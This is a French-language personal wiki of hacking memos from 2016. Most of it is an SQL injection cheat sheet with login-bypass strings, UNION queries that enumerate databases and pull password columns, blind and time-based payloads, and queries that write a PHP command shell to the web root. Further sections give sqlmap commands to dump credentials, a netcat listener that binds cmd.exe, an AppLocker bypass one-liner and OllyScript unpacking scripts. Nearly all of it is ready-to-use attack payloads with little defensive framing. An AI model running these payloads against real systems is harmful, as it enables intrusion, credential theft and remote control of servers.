:[[C]] - [[C++]] - [[C Sharp]] - [[Java]] - [[Shell]] - [[Perl]] - [[Python]] - [[Ruby]] - [[PowerShell]] - [[PHP]] - [[HTML]] - [[JavaScript]] - [[SQL]] - [[Assembleur]] - [[GCC]]

== Stockage ==
:[[Switchs SAN]] - [[Baies DS8000]] - [[Baies EMC]] - [[SVC]] - [[NetApp]]

==Software==
:[[Apache]] [[MySQL]] [[SQLite]]

== Sécurité ==
:[[Web]] - [[BOF]] - [[Reverse]] - [[Botnets]] - [[Network]] - [[Fingerprint]] - [[Crack Pass]] - [[SSH]] - [[Nmap]] - [[ Scapy]] - [[Metasploit]] - [[Nessus]] - [[Outils divers]] - [[Sécu-Tips]]

== Divers ==
:[[Mémo VI]] - [[Mémo MediaWiki]] - [[Mémo Firefox]] - [[Mémo Chrome/Chromium]] - [[Beer]]

== Liens externes ==

:[[Hacking et sécurité]] - [[Développement]]

1.1 Injection SQL

2016-09-27T20:49:50Z

Futex :

Injecter
OR 'a'='a ou '1 or '1'='1

Smitch' OR '1'='1
Smitch' OR 1=1 OR 'a'='a

Pour que la requète SQL devienne
SELECT login FROM users WHERE login='Smitch' OR 'a'='a' AND password='test123'OR 'a'='a'
SELECT * FROM notice WHERE id='0' UNION SELECT NULL,NULL,NULL,User()''

ou 'OR 1=1# en mot de passe, tous ce qui est derrière le # est ignoré.

Avec un commentaire:
http://toto.com/ident.php?login='/*&pass=*/or+'1'='1

Recherche du nombre de champ dans la requête
http://toto.com/ident.php?login='ORDER BY 3/*&pass=toto ou
http://toto.com/test.php?id=1' UNION SELECT 1,2,3,'4
Si la requête tombe en erreur c'est que l'on a dépassé le nombre de champ

Recherche de l'ID
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT 1,2,3/*&pass=toto

Affichage de la version de Mysql
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT @@version,2,3/*&pass=toto
http://toto.com/test.php?id=0' UNION SELECT @@version,1,'2

Recherche des bases
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(schema_name)FROM information_schema.schemata)2,3/*pass=toto
http://toto.com/Fonctions/test.php?id=0' UNION SELECT NULL, NULL, NULL, SCHEMA_NAME AS `Database` FROM INFORMATION_SCHEMA.SCHEMATA WHERE '1

Lister les tables
-1 UNION SELECT null,TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = database();--
-1 UNION SELECT (SELECT GROUP_CONCAT(table_name)FROM information_schema.tables WHERE table_schema=database()),null

http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(table_name)FROM information_schema.tables WHERE table_schema LIKE 'vuln_php'),2,3/*&pass=toto
http://toto.com/Fonctions/test.php?id=0' UNION SELECT null,null,null,TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = database() OR '1
http://toto.com/Fonctions/test.php?id=0hulk’ union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()#

Afficher les champs
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema LIKE 'vuln_php' AND table_name LIKE 'writers'),2,3/*&pass=toto
http://toto.com/Fonctions/test.php?id=0' UNION SELECT NULL ,NULL, NULL, COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = database() AND TABLE_NAME='Users
http://toto.com/Fonctions/test.php?id=hulk’ union select 1,group_concat(column_name, 0x0a),3,4,5,6,7 from information_schema.columns where table_name=”users”#

Afficher les valeurs
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(password)FROM writers)2,3/*&pass=toto
http://toto.com/ident.php?login=hulk’ union select 1,login,password,email,secret,6,7 from users#

Sauvegarder dans un fichier INTO OUTFILE et INTO DUMPFILE (et lancer du code PHP en même temps)

SELECT '<? system($cmd); ?>' FROM existant_table INTO DUMPFILE '/path/to/website/backdoor.php'
SELECT * FROM notice WHERE id='0' UNION SELECT null, '<?php system(\$_GET[cmd]) ?>' INTO OUTFILE '/tmp/toto.php'

Lire un fichier

SELECT LOAD_FILE('/complete/path/file2.txt')

Lire et copier un fichier

SELECT LOAD_FILE('/complete/path/config.php') FROM existant_table INTO OUTFILE '/complete/path/config.txt'

UNION
http://toto.com/test.php?id=0' UNION SELECT id,Login,PASSWORD FROM Users WHERE '1 donne la requête
SELECT * FROM notice WHERE id='0' UNION SELECT id,Login,PASSWORD FROM Users WHERE '1'

Lors d'un UNION si les deux champs union ne sont pas du même type integer <- string les convertir grâce a: SELECT CONV(mpass,36,10)
SELECT mid FROM membres WHERE mid=4 UNION SELECT CONV(mpass,36,10) FROM membres WHERE mid=5

On peut concaténer 2 champs avec la fonction CONCAT(mlogin,char(58),char(58),memail)
SELECT * FROM admin WHERE alogin='webmaster' UNION SELECT mid,CONCAT(mlogin,char(58),char(58),memail),mpass,mnewsletter FROM membres WHERE mlogin='Franck'

Faire en sorte que la première requête ne renvoi rien (mid=-1 ou mid=5 OR 1=0 UNION SELECT apass FROM admin WHERE aid=1)
SELECT mlogin FROM membres WHERE mid=-1 UNION SELECT apass FROM admin WHERE aid=1
SELECT mlogin FROM membres WHERE mid=-1 UNION SELECT apass FROM admin WHERE aid=1 INTO OUTFILE '/path/apass.txt'

----

Recherche en aveugle

Utiliser la fonction IF de mysql et la dichotomie
IF(10, 0, 666) (Si c'est on renvoit 666, sinon 0)

ex:
http://toto.com/ident.php?login=' AND IF((SELECT COUNT(*) FROM information_schema.SCHEMATA)>100,0(SELECT table_name FROM information_schema.TABLES))/*&pass=ds

== Blind MySQL injection ==

Recherche de mot de passe caractère par caractère
profile.php?user_id=1 AND substr(password,0,1)= 0×66

== Injection sous SQLite ==

Afficher la version de SQLite
'UNION SELECT sqlite_version(),2
Trouver les noms des bases de données
'UNION SELECT name,2 FROM sqlite_master WHERE type = "table"--
Renvoit: news,users

Trouver le nom des champs:
'UNION SELECT sql,2 FROM sqlite_master WHERE tbl_name = 'users' AND type = 'table'--

Renvoit: CREATE TABLE users(username TEXT, password TEXT, Year INTEGER) (2)

Afficher les champs :
'UNION SELECT username,password FROM users--

== Blind SQLite injection ==
Recherche du premier caractère du login
'UNION SELECT username,password FROM users WHERE substr(username,0,1)= 'a'--

Recherche de la longueur du pass:
'UNION SELECT username,password FROM users WHERE username='admin' AND LENGTH(password) > 4 --

== Time based injection ==

Mysql
admin' and sleep(30)#

Microsoft SQL
admin' waitfor delay '00:00:10'--

Oracle
BEGIN DBMS_LOCK.SLEEP(15); END;

Outils divers

2016-09-07T09:41:18Z

Futex :

== Stunnel ==
Créer un tunnel SSL
#stunnel -c -d 127.0.0.1:9999 -r foo:9998
Sur l'hôte disant:
#stunnel -d 9998 -r 127.0.0.1:9999

== SQLMap ==

Récupérer le nom de la base (-v 5 pour plus de verbosité)
# sqlmap -u 'http://172.16.188.134/test.php?id=1' --dbs -v 5
Afficher les tables
# sqlmap -u 'http://172.16.188.134/test.php?id=1' -v 5 -D credo --tables
Afficher les colonnes de la table members
# sqlmap -u 'http://172.16.188.134/test.php?id=1' -D credo -T members --columns
Dump de la base
# sqlmap -u 'http://172.16.188.134/test.php?id=1' -D credo -T members --dump

# python sqlmap.py -u http://www.test.com/pages.php?num=1 -f -b --current-user --current-db --users --passwords -dbs -v 0

# ./sqlmap.py -u http://www.test.com/pages.php/index.php --string="This user exists" --technique=B --auth-type=Basic --auth-cred=toto:hash --data "username=georges" -D DatabaseName -T TableName -C username,password --dump --level=5 --risk=3

Options utilisées

-u : adresse de la cible
-f : prise d’empreinte du SGBD
-b : bannière du SGBD
–current-user : session utilisateur
–current-db : Base
–users : énumération des utilisateurs dans la Base
–passwords : énumération des mots de passe dans la Base
–dbs : listing des différentes bases disponibles
-v : verbosité (0, warning, etc.)

== Netcat/Cryptcat ==

*Cryptcat est un clone de Netcat cryptant toutes ces communications

Scanner des ports
nc -v -w 2-z foo 1-1224

Se connecter sur un port
nc -v -n 192.168.1.1 21

Mettre netcat en écoute (serveur)
nc -L p 10001 -d -e cmd.exe (-L en écoute, -p port, -d détacher le process -e commande à lancer à la connection)

Envoyer un fichier
nc 192.168.1.1 1234 < file.txt

== MacChanger ==

Changer la mac adress de la carte réseau
#macchanger -m 12:34:56:78:90:12 eth0

== Identification de fichiers ==
La commande file analyse l'entête du fichier et révélera sa nature 
strings permet de trouver des chaînes ASCII 
xdd permet de retrouver des mots et leur endroits. 
hachoir-subfile examine tous le fichier à la recherche d'entête connus. Pratique en cas de concaténation de fichiers. 
Si c'est un fichier binaire, le déboguer avec gdb. 
Le désassembler avec objdump ou IDA. 

== Applocker Bypass ==

Powershell

[System.Reflection.Assembly]::LoadFrom("C:\BinaireDotNet.exe").entrypoint.invoke($null, $null)

Ollydbg

2016-09-02T12:10:51Z

Futex : /* OllyScript Example */

== OllyScript ==

== OllyScript Example ==

UPX

<pre>
var hwdBP // Local variable to store hardware breakpoint
var softBP // Local variable to strore software breakpoint

sti // Step into F7 command
findop eip, #61# // find next POPAD
mov hwdBP, $RESULT // Store $RESULT to hardware breakpoint local variable
bphws hwdBP, "x" // Set hardware breakpoint (execute) on the next POPAD
run // Run F9 command
findop eip, #E9????????# // Find the next JMP
mov softBP, $RESULT // Store $RESULT to software breakpoint local variable
bp softBP
run // Run to JMP instruction
sti // Step into the OEP

cmt eip, "<-- OEP"
msg "OEP found"
ret
</pre>

ASpack

<pre>
var hwBP // Local variable for hardware breakpoint

mov hwBP, esp // Using esp trick
bphws hwBP, "r" // Set hardware breakpoint on read
run // Run
rtr // Execute till return
sto // F8

msg "OEP found"
cmt eip, "<-- OEP"
ret
</pre>

Ollydbg

2016-09-02T10:08:11Z

Futex : Page créée avec « == OllyScript == == OllyScript Example == UPX <pre> var hwdBP // Local variable to store hardware breakpoint var softBP // Local variable to strore software breakpoint ... »